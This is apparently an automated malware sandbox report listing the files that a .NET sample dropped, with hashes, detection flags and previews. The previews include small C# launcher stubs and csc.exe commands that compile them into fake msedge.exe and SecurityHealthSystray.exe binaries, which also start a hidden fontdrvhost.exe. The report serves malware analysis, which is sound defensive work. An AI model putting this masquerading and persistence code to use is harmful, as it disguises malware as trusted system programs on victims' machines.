                                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\knfjrLFSex

                                                                                          Download File
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\mbZIWYvFLY

                                                                                          Download File
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):25
                                                                                          Entropy (8bit):4.213660689688185
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:0ruPEyHgN:SuPEyAN
                                                                                          MD5:454E18D2793D998A7C318DF8F984DCA5
                                                                                          SHA1:06AB78AFC1CFFCDB5DD5AE9D6EA90861803D432C
                                                                                          SHA-256:07A48FE6218BADC877CA7F462D315C53AF0A0EDE27F1AA8CA5F3CD6A2A2B0E49
                                                                                          SHA-512:2C86A2564C2E1E7288E808A9886C71C1A9B2E270AB030D2AF8FA0398DBC6AA36C0150C0B3B640086D4C6812E05576BABDD212B94F1DFCAF825A84E5506DEB3BB
                                                                                          Malicious:false
                                                                                          Preview:StvN4UxNJ39jfglv8hGbbgFvd

                                                                                          C:\Users\user\AppData\Local\Temp\obsldskd\obsldskd.0.cs

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                          Category:dropped
                                                                                          Size (bytes):396
                                                                                          Entropy (8bit):4.9238041556274785
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBLkiFkD:JNVQIbSfhWLzIiFkMSfhVFkD
                                                                                          MD5:757BEBC24CC2EE0533EBA9A1FF3AAEC1
                                                                                          SHA1:F550D10D42539516B690A7F1F3A94F48F2F822E5
                                                                                          SHA-256:72A23A3A3014689B4BAE5A10CD03FC1FF06A9AB0B98FC219F908C76F26DD1D5F
                                                                                          SHA-512:AD0C7D3E343D3D7690542919E1EFAFAF63AACCFDB83F21399D79E9B92955CB60CC10827C4BC62D455BAC13A58020D616CD723472F0291CEC4B8909C416CAFC55
                                                                                          Malicious:false
                                                                                          Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Users\All Users\fontdrvhost.exe"); } catch { } }).Start();. }.}.

                                                                                          C:\Users\user\AppData\Local\Temp\obsldskd\obsldskd.cmdline

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):266
                                                                                          Entropy (8bit):5.089399053072649
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8oCHhJ23fCXun:Hu7L//TRRzscQDaXu
                                                                                          MD5:7051DAB1B0376FCF7E6AC09271CF5887
                                                                                          SHA1:3AAC4A0F4A63580AB31380EEC9023BB68082CBCE
                                                                                          SHA-256:D16B7EF367CF1C4CB2A90F27AA551E9A0D333A181E578770741C25B136C482CD
                                                                                          SHA-512:5DD70D9E7F83C1AFF7F13ABB825299E3599A759BA11FB91291AC76AEC8A56BB868BFDB0143190E359CEB18D46BC968ADE5E8218C9D0B990E4D6A5023DC404F8F
                                                                                          Malicious:true
                                                                                          Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\obsldskd\obsldskd.0.cs"

                                                                                          C:\Users\user\AppData\Local\Temp\obsldskd\obsldskd.out

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (346), with CRLF, CR line terminators
                                                                                          Category:modified
                                                                                          Size (bytes):767
                                                                                          Entropy (8bit):5.236019919361814
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:K8/I/u7L//TRRzscQDaXPKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KOI/un/VRzstDwKax5DqBVKVrdFAMBJj
                                                                                          MD5:F714776F054FD0946F052CB62D0519C1
                                                                                          SHA1:089F61DB49A4E8B04F0BFE9C396C678FB1124761
                                                                                          SHA-256:AC9F4012F67F96C9C741648617505DA4DACEFDA7BC7C93B72403D494645A8656
                                                                                          SHA-512:6CEC1F09431F7DAE120082CC99C21BBBCBF3DC2275EED6C9BACB7C6EDA1FA4C9F059E630E9B77304CBE2DEFD2A03EA264CD86257269B03908894F51D381FD4CF
                                                                                          Malicious:false
                                                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\obsldskd\obsldskd.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                          C:\Users\user\AppData\Local\Temp\s6mvxiTOTa

                                                                                          Download File
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\szKE9Jtpia

                                                                                          Download File
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):51200
                                                                                          Entropy (8bit):0.8746135976761988
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                          MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                          SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                          SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                          SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\wJ209DNX6B

                                                                                          Download File
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.6732424250451717
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\wWN8CJ4lbM

                                                                                          Download File
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\xugspH6XJw

                                                                                          Download File
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1373607036346451
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                                          MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                                          SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                                          SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                                          SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\zrf14fw5\zrf14fw5.0.cs

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                          Category:dropped
                                                                                          Size (bytes):381
                                                                                          Entropy (8bit):4.886230414160619
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:V/DBXVgtSaIb2Lnf+eG6L2F0T7bfwlxFK8wM2Lnf+eG6L2hIDUDhiFK8wQAv:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLkb
                                                                                          MD5:B6AE7461825B88E7AA9E2149F2687676
                                                                                          SHA1:46324B23A33A6551D3C0D48CABF489B2ED3D2F77
                                                                                          SHA-256:DCBCB31661B9D4AA33FCE15141587E59FD6CE14EFDCFE38F1D91A6F36613B8D9
                                                                                          SHA-512:C72F6352B658703AEDFE6E14288E89A7960ACC037845F561D313B405230D17A5815DB5B40BD1BE2E1E4077DAF18202DA622C713DB35E54C34FBCB2D5A683249E
                                                                                          Malicious:false
                                                                                          Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Users\All Users\fontdrvhost.exe"); } catch { } }).Start();. }.}.

                                                                                          C:\Users\user\AppData\Local\Temp\zrf14fw5\zrf14fw5.cmdline

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):251
                                                                                          Entropy (8bit):5.133056207295608
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8oCHhJ23fUm:Hu7L//TRq79cQDj
                                                                                          MD5:F0D8CB6AEF0C8AA08F3DC3786F95F660
                                                                                          SHA1:8069150020971E6AD3C33108686843E4828841CF
                                                                                          SHA-256:D994EA085EE63E21D7D80195AE79DA5753636FBFA5370A1F553092C7864F9B38
                                                                                          SHA-512:BA46781B088288EFB15AD95E9136F0A69A75D90E72AB12F84E4303BAE34FBA391C678443ECF14584F1748A7D83503767CDE232529E4A2C8C5E1B993E18914581
                                                                                          Malicious:false
                                                                                          Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\zrf14fw5\zrf14fw5.0.cs"

                                                                                          C:\Users\user\AppData\Local\Temp\zrf14fw5\zrf14fw5.out

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (331), with CRLF, CR line terminators
                                                                                          Category:modified
                                                                                          Size (bytes):752
                                                                                          Entropy (8bit):5.265990422832311
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:K8/I/u7L//TRq79cQDCKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KOI/un/Vq79tDCKax5DqBVKVrdFAMBJj
                                                                                          MD5:36EC48D8A867BB4E9D0B47FD9DC5DAC8
                                                                                          SHA1:175E054936CD0D9A3FCCFD20C96B47B1A678F774
                                                                                          SHA-256:F64ED2CBF93E681F03F743B4FF9115872628D9D73976AF5C928843191E939B3B
                                                                                          SHA-512:80B87EF4027352A7FB5F65E8B8B9EDC456800B059D1D62C58C3C81FFA92FEC282CFEA7EE02CA6B34D300378DAB90EEA03449B663A2A11D448FB8B0D0568A2E9C
                                                                                          Malicious:false
                                                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\zrf14fw5\zrf14fw5.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                          C:\Windows\Help\Corporate\1156fbdc9c3eb4

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):209
                                                                                          Entropy (8bit):5.642719904569892
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:4J72WdyOjSsO/Xem/f3JdZ0Yg0qze/4Ic7:G8Ou//bZ0YEz1
                                                                                          MD5:8A14699E210F8A3D9226A4BBD2E71DC0
                                                                                          SHA1:D71FD89482B65E22BCAA5F5EDA65C641D9354DBF
                                                                                          SHA-256:3B2F44E74A90C30A5350E4AD023D9C2188BD4E38927679AA9A3DFB6C9131DB38
                                                                                          SHA-512:D923F30B83E711BCFCF58FED8B5769F8DBD3B8B8637842F998B1E7335D53BABCF73C223BDFEC4A1A32FA740F77109CFF1DE47B53B205856DFB634C924CD07616
                                                                                          Malicious:false
                                                                                          Preview:dH0iFWbv7Fbb3yVGeZ3gnDz8W4BvTRPCBL2vkWVLnIYcbiojm2R3O8iaS2MKVqcpzZZr6jgIEs2fpXgyQcIbAWyCmbdrKK07psmCI6mCWIyfFDv4WY42hBodkWEeFy8425z6udpTzFE2hS6jqiVwP7ZoDJcv1I6iJ4nKOyK2slCb6w5RZfyhcMo4gK2lB3brIgsmpwV1YdDo47rRN

                                                                                          C:\Windows\Help\Corporate\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):903680
                                                                                          Entropy (8bit):5.346245125656977
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:Sey1d7N520G7/XsQcJ4/VADlK3Yogh4DrJgDmkAkZeR+HjYIAWCKCwxuEPY4rPva:SJZMjsNoVrWXuehAVfmG66t
                                                                                          MD5:02E08842C25F66B1FFE53CE0F50F1758
                                                                                          SHA1:A5D1E71B9E6484A5EBC555DD41A5450909387CB2
                                                                                          SHA-256:EB3FF36D945D22D68D24690566115EAC07C6666154EC18DD37527673375E41FA
                                                                                          SHA-512:807A3A8C5A223F843989FF1488198C7700A0E1AD779B7E055CE93AD44FEF24C62A4025325621EE7B402CB771584EC847E9CB63177BEE8672B31B3C7F6F5B5DB3
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."...................... ........@.. .......................@......@.....@.....................................K.......p.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...p...........................@..@.reloc....... ......................@..B........................H.......P...0...........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                          C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):55
                                                                                          Entropy (8bit):4.306461250274409
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                          Malicious:false
                                                                                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                          C:\Windows\System32\CSC533681BDB06443E789816E6615DEB19.TMP

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                          File Type:MSVC .res
                                                                                          Category:dropped
                                                                                          Size (bytes):1224
                                                                                          Entropy (8bit):4.435108676655666
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                          MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                          SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                          SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                          SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                          Malicious:false
                                                                                          Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                                                                          C:\Windows\System32\SecurityHealthSystray.exe

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):4608
                                                                                          Entropy (8bit):3.930247979992911
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:6yJ7PtcjM7Jt8Bs3FJsdcV4MKe27aMvqBHeOulajfqXSfbNtm:VPlPc+Vx9MaMvk4cjRzNt
                                                                                          MD5:361C4179D66C34AD3BDCB8D19A88B9D0
                                                                                          SHA1:1089D901EB8C9836169C63E0E37C943EEE78DC2F
                                                                                          SHA-256:7A24BFB143B9E118D70EA569804F442B2F1A9F61EA32F073EF99207D6B1CF0FC
                                                                                          SHA-512:BCBA0B0D41D34F05303FEBD1315F23C0CED47786F7B50C2B4A208D3BEB56FF57E1D200B7C1A2F5100EF2A87D3902394F190FA27610FB06491EA3EFDB9797728B
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C.Wg.............................'... ...@....@.. ....................................@.................................<'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p'......H.......(!................................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                                                                          \Device\Null

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\PING.EXE
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):502
                                                                                          Entropy (8bit):4.630609828667227
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:PpA5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:xidUOAokItULVDv
                                                                                          MD5:8BC8C3E24D760305B8D4601B4D3789EA
                                                                                          SHA1:049911B2CA689F1063943675E26791264C73B0BC
                                                                                          SHA-256:CC070075EE88AB8A30FE7D1B5174E2274C7F0041BEB8A013940FCB53801D6275
                                                                                          SHA-512:8C4D5146BEE934D113DBDD67A5B1D8A377AB8DB5B10CD990A8DB537EC000562929395654570035978605F2E170550B75EDABDFD637DE3ACE4AF47FD212B559F5
                                                                                          Malicious:false
                                                                                          Preview:..Pinging 585948 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Entropy (8bit):5.946392176570888
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                          • Windows Screen Saver (13104/52) 0.07%
                                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                          File name:Wh2c6sgwRo.exe
                                                                                          File size:400'384 bytes
                                                                                          MD5:43d30c776f593efdf5416ab4142442d6
                                                                                          SHA1:3f7f251511aa918a3c221cb4d039e406e9449132
                                                                                          SHA256:aafd35488559a2ef64b3758eff767046369f540af491f9325d344c2ef214587a
                                                                                          SHA512:8b1b195775c3de13cc281fe9d92580230fcdb48a9dab001eaa442328aa88e1ec27ced4cdaaa941bb42141a269e7f844f4dd945d8a9a6df06bb05393271987238
                                                                                          SSDEEP:6144:sSg0P0VgwhTfR4NATIVDHPfq1NRHR5/nQibDVDeFtJ9JDwzTE3GL0:+hLR4vq1N354iHQj1X3G
                                                                                          TLSH:3A84F71BFA428D51C2985B33D5DF440863B4DA8176ABDE0E38CA23E5494337BED8E587
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..............1... ...@....@.. ....................................`................................

                                                                                          File Icon

                                                                                          Icon Hash:00928e8e8686b000

                                                                                          Static PE Info

                                                                                          General

                                                                                          Entrypoint:0x46311e
                                                                                          Entrypoint Section:.text
